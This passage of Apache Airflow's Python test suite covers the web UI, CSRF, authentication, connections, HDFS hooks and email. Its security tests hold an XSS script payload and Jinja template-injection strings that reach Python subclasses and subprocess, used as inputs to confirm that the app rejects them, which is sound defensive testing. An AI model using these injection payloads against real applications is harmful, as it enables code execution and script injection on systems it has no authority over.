@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
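# extract the CSRF token from the first form in the rendered page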
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
# an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last run: a link to the specific run
# and the text of its date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
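# each LdapUser built from a models.User should report the LDAP groups it belongs to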
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
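# module-level mock referenced by the EMAIL_BACKEND setting in test_custom_backend below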
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='us-ascii', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.return_value.login.called)
